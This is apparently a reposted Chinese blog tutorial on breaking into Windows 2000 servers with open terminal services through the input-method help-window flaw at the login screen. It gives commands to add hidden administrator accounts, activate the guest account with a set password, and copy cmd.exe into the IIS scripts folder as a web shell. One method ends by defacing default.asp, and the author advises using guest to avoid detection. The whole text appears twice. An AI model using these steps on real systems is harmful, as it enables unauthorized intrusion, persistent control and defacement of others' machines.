下面我来讲讲如何利用输入法漏洞远程***开了终端服务的windows 2000的机器:
首先我们确定某台机器的3389端口是开放的:
D:\\Nmapnt>nmapNT.exe -sS -p 3389 xxx.xxx.xxx.xxx
Starting nmapNT V. 2.53 by [email]ryan@eEye.com[/email]
eEye Digital Security ( [url]http://www.eEye.com[/url] )
based on nmap by [email]fyodor@insecure.org[/email] ( [url]www.insecure.org/nmap/[/url] )
Interesting ports on FGF-DELL4300 (xxx.xxx.xxx.xxx):
Port State Service
3389/tcp open msrdp
Nmap run completed -- 255 IP addresses (93 hosts up) scanned in 542 seconds
D:\TOOLS\nmapNT\Nmapnt>
现在我们已经可以看到这台机器的终端服务是开放的,那么我们就可以开始行动了。
打开终端服务客户端,添上IP地址,选择连接。
稍等片刻,一般是很快的,就会出现熟悉的登陆对话框了,这是我们看看有没有输入法的漏洞。有关输入法的漏洞请参看相关文章。如果有输入法漏洞那么我们如何取得控制权呢?经过多次的研究试验。终于想出了一个办法。我们发现在跳至url后,我们双击winnt目录下的explorer.exe并没什么反应(是机上已经运行了,可是我们为什么看不到结果呢?),如果我们不断的进行双击,或者什么也不做,一会儿连接将被断开,在断开的一霎那,我们似乎看到了我们双击出来的窗口。经过几次试验,我们发现不登陆进去是不行的,将会被服务端断开。于是想办法先登陆进去,我想到了在帮助中打开用户管理器,经过试验,在跳至url中添入:mk:@MSITStore:C:\WINNT\Help\TSHOOTconcepts.chm::/where_usermgr.htm
在右侧会出现一个可以打开本地用户和组的管理器的链接,本来在正常情况下是可以打开这个管理器的,
可是在没有登陆进去的时候就是出不来,于是想另外的办法。终于想到了建立一个命令行的快捷方式。在跳
至url中输入:c:\winnt\system32,然后找到net.exe,右键点击net.exe,选择创建快捷方式,于是创建了
一个文件名为快捷方式net.lnk的文件,然后再右键点击这个快捷方式,选择属性,这时我们就可以输入我们
的命令了。在目标中添入我们要执行的命令的路径和参数就行了,我们还是用net命令,因此不必改路径了,
添加个账号test的命令如下,C:\WINNT\system32\net.exe user test/add。密码为空。然后双击这个快捷方
式运行它。然后我们把这个账号添加到administrators组中,
C:\WINNT\system32\net.exe localgroup administrators test/add。OK!再运行。我们现在已经基本上成功了,
关掉帮助窗口,用test账号登陆,密码为空。进去后我们把刚才建的快捷方式删掉。然后再将本地用户的
TSinternetuser账号加进administrators组中,设置密码。这样我们下次就可以用这个账号进来了。然后
再用这个账号登陆一下,如果能够登陆,就删掉刚刚建立的test账号。
这台机器就这样控制在我们的手里了。。。。。。
方法二:
其过程如下:
1.扫描 3389 port 终端服务默认;
2.用终端客户端程序进行连接;
3.按ctrl+shift调出全拼输入法(其他似乎不行),点鼠标右键(如果其帮助菜单发灰,就赶快赶下家吧,人家打补丁了),点帮助,点输入法入门;
4.在"选项"菜单上点右键--->跳转到URL",输入:c:\winnt\system32\cmd.exe.(如果不能确定NT系统目录,则输入:c:\ 或d:\ ……进行查找确定);
5.选择"保存到磁盘" 选择目录:c:\inetpub\scripts\,因实际上是对方服务器上文件自身的复制操作,所以这个过程很快就会完成;
6.打开IE,输入:[url]http://ip/scripts/cmd.exe?/c[/url] dir 怎么样?有cmd.exe文件了吧?这我们就完成了第一步;
7.[url]http://ip/scripts/cmd.exe?/c[/url] echo net user guest /active:yes>go.bat
8.[url]http://ip/scripts/cmd.exe?/c[/url] echo net user guest elise>>go.bat
9.[url]http://ip/scripts/cmd.exe?/c[/url] echo net localgroup administrators /add guest>>go.bat
10.[url]http://ip/scripts/cmd.exe?/c[/url] type go.bat 看看我们的批文件内容是否如下:
net user guest /active:yes
net user guest elise
net localgroup administrators /add guest
11.在"选项"菜单上点右键--->跳转到URL",输入:c:\inetpub\scripts\go.bat --->在磁盘当前位置执行;
12.呵呵,大功告成啦,这样我们就激活了服务器的geust帐户,密码为:elise,超级用户呢! (我喜欢guest而不是建立新帐户,这样似乎不易被发现些),这样你就可用IPC$连接,想怎样做就怎样做了,当然,你也可用guest直接登陆到他的服务器,到他机器上去跳舞吧:)
方法三:
用端口扫瞄程序扫IP的3389端口,得到xx.xx.xx.xx。
2、运行windows2000终端客户程序,在服务器输入框里填入:xx.xx.xx.xx ,连接。
3、出现windows2000的登陆窗口,按下CTRL+SHIFT键,出现全拼输入法。
4、在输入法状态条上按mouse右键,选择帮助,选择输入指南,选择"选项"按右键。
5、选择"跳转到URL",输入:c:\winnt\system32\cmd.exe.
6、选择"保存到磁盘"。
7、选择目录:c:\inetpub\scripts\
8、打开IE,输入:xx.xx.xx.xx/scripts/cmd.exe?/c+dir+c:\ (知道了吧)
9、输入:xx.xx.xx.xx/scripts/cmd.exe?/c+echo+BEIJING+>c:\inetpub\wwwroot\default.asp
10。OK
首先我们确定某台机器的3389端口是开放的:
D:\\Nmapnt>nmapNT.exe -sS -p 3389 xxx.xxx.xxx.xxx
Starting nmapNT V. 2.53 by [email]ryan@eEye.com[/email]
eEye Digital Security ( [url]http://www.eEye.com[/url] )
based on nmap by [email]fyodor@insecure.org[/email] ( [url]www.insecure.org/nmap/[/url] )
Interesting ports on FGF-DELL4300 (xxx.xxx.xxx.xxx):
Port State Service
3389/tcp open msrdp
Nmap run completed -- 255 IP addresses (93 hosts up) scanned in 542 seconds
D:\TOOLS\nmapNT\Nmapnt>
现在我们已经可以看到这台机器的终端服务是开放的,那么我们就可以开始行动了。
打开终端服务客户端,添上IP地址,选择连接。
稍等片刻,一般是很快的,就会出现熟悉的登陆对话框了,这是我们看看有没有输入法的漏洞。有关输入法的漏洞请参看相关文章。如果有输入法漏洞那么我们如何取得控制权呢?经过多次的研究试验。终于想出了一个办法。我们发现在跳至url后,我们双击winnt目录下的explorer.exe并没什么反应(是机上已经运行了,可是我们为什么看不到结果呢?),如果我们不断的进行双击,或者什么也不做,一会儿连接将被断开,在断开的一霎那,我们似乎看到了我们双击出来的窗口。经过几次试验,我们发现不登陆进去是不行的,将会被服务端断开。于是想办法先登陆进去,我想到了在帮助中打开用户管理器,经过试验,在跳至url中添入:mk:@MSITStore:C:\WINNT\Help\TSHOOTconcepts.chm::/where_usermgr.htm
在右侧会出现一个可以打开本地用户和组的管理器的链接,本来在正常情况下是可以打开这个管理器的,
可是在没有登陆进去的时候就是出不来,于是想另外的办法。终于想到了建立一个命令行的快捷方式。在跳
至url中输入:c:\winnt\system32,然后找到net.exe,右键点击net.exe,选择创建快捷方式,于是创建了
一个文件名为快捷方式net.lnk的文件,然后再右键点击这个快捷方式,选择属性,这时我们就可以输入我们
的命令了。在目标中添入我们要执行的命令的路径和参数就行了,我们还是用net命令,因此不必改路径了,
添加个账号test的命令如下,C:\WINNT\system32\net.exe user test/add。密码为空。然后双击这个快捷方
式运行它。然后我们把这个账号添加到administrators组中,
C:\WINNT\system32\net.exe localgroup administrators test/add。OK!再运行。我们现在已经基本上成功了,
关掉帮助窗口,用test账号登陆,密码为空。进去后我们把刚才建的快捷方式删掉。然后再将本地用户的
TSinternetuser账号加进administrators组中,设置密码。这样我们下次就可以用这个账号进来了。然后
再用这个账号登陆一下,如果能够登陆,就删掉刚刚建立的test账号。
这台机器就这样控制在我们的手里了。。。。。。
方法二:
其过程如下:
1.扫描 3389 port 终端服务默认;
2.用终端客户端程序进行连接;
3.按ctrl+shift调出全拼输入法(其他似乎不行),点鼠标右键(如果其帮助菜单发灰,就赶快赶下家吧,人家打补丁了),点帮助,点输入法入门;
4.在"选项"菜单上点右键--->跳转到URL",输入:c:\winnt\system32\cmd.exe.(如果不能确定NT系统目录,则输入:c:\ 或d:\ ……进行查找确定);
5.选择"保存到磁盘" 选择目录:c:\inetpub\scripts\,因实际上是对方服务器上文件自身的复制操作,所以这个过程很快就会完成;
6.打开IE,输入:[url]http://ip/scripts/cmd.exe?/c[/url] dir 怎么样?有cmd.exe文件了吧?这我们就完成了第一步;
7.[url]http://ip/scripts/cmd.exe?/c[/url] echo net user guest /active:yes>go.bat
8.[url]http://ip/scripts/cmd.exe?/c[/url] echo net user guest elise>>go.bat
9.[url]http://ip/scripts/cmd.exe?/c[/url] echo net localgroup administrators /add guest>>go.bat
10.[url]http://ip/scripts/cmd.exe?/c[/url] type go.bat 看看我们的批文件内容是否如下:
net user guest /active:yes
net user guest elise
net localgroup administrators /add guest
11.在"选项"菜单上点右键--->跳转到URL",输入:c:\inetpub\scripts\go.bat --->在磁盘当前位置执行;
12.呵呵,大功告成啦,这样我们就激活了服务器的geust帐户,密码为:elise,超级用户呢! (我喜欢guest而不是建立新帐户,这样似乎不易被发现些),这样你就可用IPC$连接,想怎样做就怎样做了,当然,你也可用guest直接登陆到他的服务器,到他机器上去跳舞吧:)
方法三:
用端口扫瞄程序扫IP的3389端口,得到xx.xx.xx.xx。
2、运行windows2000终端客户程序,在服务器输入框里填入:xx.xx.xx.xx ,连接。
3、出现windows2000的登陆窗口,按下CTRL+SHIFT键,出现全拼输入法。
4、在输入法状态条上按mouse右键,选择帮助,选择输入指南,选择"选项"按右键。
5、选择"跳转到URL",输入:c:\winnt\system32\cmd.exe.
6、选择"保存到磁盘"。
7、选择目录:c:\inetpub\scripts\
8、打开IE,输入:xx.xx.xx.xx/scripts/cmd.exe?/c+dir+c:\ (知道了吧)
9、输入:xx.xx.xx.xx/scripts/cmd.exe?/c+echo+BEIJING+>c:\inetpub\wwwroot\default.asp
10。OK
转载于:https://blog.51cto.com/hanbing/57801
254
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
